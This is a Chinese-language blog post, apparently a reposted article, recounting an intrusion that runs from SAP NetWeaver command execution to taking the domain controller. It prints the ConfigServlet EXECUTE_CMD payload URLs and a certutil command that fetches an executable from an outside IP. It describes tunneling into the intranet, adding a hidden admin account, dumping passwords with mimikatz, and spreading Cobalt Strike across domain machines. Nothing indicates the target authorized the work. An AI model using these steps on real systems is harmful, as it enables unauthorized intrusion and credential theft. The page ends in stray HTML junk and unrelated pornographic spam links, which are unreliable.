<kbd id="afajh"><form id="afajh"></form></kbd>
<strong id="afajh"><dl id="afajh"></dl></strong>
    <del id="afajh"><form id="afajh"></form></del>
        1. <th id="afajh"><progress id="afajh"></progress></th>
          <b id="afajh"><abbr id="afajh"></abbr></b>
          <th id="afajh"><progress id="afajh"></progress></th>

          記一次命令執(zhí)行到內(nèi)網(wǎng)滲透拿下域控

          共 2103字,需瀏覽 5分鐘

           ·

          2021-06-28 13:53

          ????關(guān)注后回復(fù) “進(jìn)群” ,拉你進(jìn)程序員交流群????


          文章來源丨瀟湘信安

          https://www.xljtj.com/archives/ad.html


          目標(biāo)站采用SAP NetWeaver是SAP的集成平臺(tái),SAP命令執(zhí)行payload為網(wǎng)址+命令。


          Windows執(zhí)行:
          http://www.test.com/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd /c net user

          Linux執(zhí)行:

          http://www.test.com/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=id

          由于提前得知目標(biāo)為Windows機(jī)器,直接在目標(biāo)網(wǎng)站執(zhí)行net user,得到如下結(jié)果


          查看當(dāng)前用戶,權(quán)限以及網(wǎng)絡(luò)信息



          得到當(dāng)前用戶sapxxx為administrator權(quán)限,同時(shí)為內(nèi)網(wǎng)機(jī)器,那么就可以直接執(zhí)行Windows自帶的下載命令,來下載一個(gè)狗洞,用來轉(zhuǎn)發(fā)流量。


          當(dāng)然你可以直接執(zhí)行比如CS、MSF、以及你自己的遠(yuǎn)控等等,但是要考慮免殺問題,就用狗洞來操作。


          Windows下載命令:

          certutil -urlcache -split -f http://8.8.8.8/test.exe C:\test.exe

          下載好之后,首先要用狗洞服務(wù)端在你自己外網(wǎng)服務(wù)器打開一個(gè)監(jiān)聽功能,目標(biāo)機(jī)器執(zhí)行上線命令,然后等待上線

          成功上線后,自己電腦連接狗洞,出現(xiàn)此提示為連接成功,之后用代理軟件,比如Proxifier或者Sockscap等工具代理本機(jī)127.0.0.1 8088端口


          然后用命令執(zhí)行去添加一個(gè)管理權(quán)限的用戶,根據(jù)上面ipconfig得到的內(nèi)網(wǎng)ip:10.85.x.x,直接連接其3389,成功添加賬號(hào)admin$,直接登陸成功


          在這里友情提示下,內(nèi)網(wǎng)中存在域時(shí),登陸賬號(hào)要選擇當(dāng)前域計(jì)算機(jī)用戶去登陸,不然會(huì)登陸不上

          執(zhí)行查詢域管機(jī)命令發(fā)現(xiàn)沒權(quán)限,然后用獼猴桃抓取一下本機(jī)賬號(hào)密碼,


          使用administxxx賬號(hào),ATxxx域去登陸,查詢域管機(jī)與域管用戶

          巧了不是,直接用得到的ATxxx\Administxxx去登陸SRV-DC-xx或者SRV-MAIN-xx,ping SRV-DC-xx和SRV-MAIN-xx得到ip


          登錄后


          既然內(nèi)網(wǎng)機(jī)器并無殺軟,那么嘗試上一個(gè)cs批量上線吧,搭建好cs服務(wù)端,直接生成文件在域控機(jī)上執(zhí)行,等待機(jī)器上線后,右鍵執(zhí)行獼猴桃,或者轉(zhuǎn)儲(chǔ)hash,讓他自動(dòng)獲取密碼

          然后執(zhí)行net view或者arp -a來獲取目標(biāo)ip

          然后到目標(biāo)處隨便框選幾臺(tái)機(jī)器,當(dāng)然你也可以全部選擇,右鍵,登陸

          然后選擇你剛才搞出來的賬號(hào)密碼,選擇一個(gè)監(jiān)聽器,坐等機(jī)器上線即可


          最后給各位大佬比心,PS: 有指教請(qǐng)您留言

          如侵權(quán)請(qǐng)私聊公眾號(hào)刪文

          -End-

          最近有一些小伙伴,讓我?guī)兔φ乙恍?nbsp;面試題 資料,于是我翻遍了收藏的 5T 資料后,匯總整理出來,可以說是程序員面試必備!所有資料都整理到網(wǎng)盤了,歡迎下載!

          點(diǎn)擊??卡片,關(guān)注后回復(fù)【面試題】即可獲取

          在看點(diǎn)這里好文分享給更多人↓↓

          瀏覽 41
          點(diǎn)贊
          評(píng)論
          收藏
          分享

          手機(jī)掃一掃分享

          分享
          舉報(bào)
          評(píng)論
          圖片
          表情
          推薦
          點(diǎn)贊
          評(píng)論
          收藏
          分享

          手機(jī)掃一掃分享

          分享
          舉報(bào)
          <kbd id="afajh"><form id="afajh"></form></kbd>
          <strong id="afajh"><dl id="afajh"></dl></strong>
            <del id="afajh"><form id="afajh"></form></del>
                1. <th id="afajh"><progress id="afajh"></progress></th>
                  <b id="afajh"><abbr id="afajh"></abbr></b>
                  <th id="afajh"><progress id="afajh"></progress></th>
                  熟女性爱网 | 久久伊人大香蕉 | 日本无不卡中文字幕在线视频 | 中文无码一区二区三区四区五区六区七区 | 97精品人人妻人人A片 |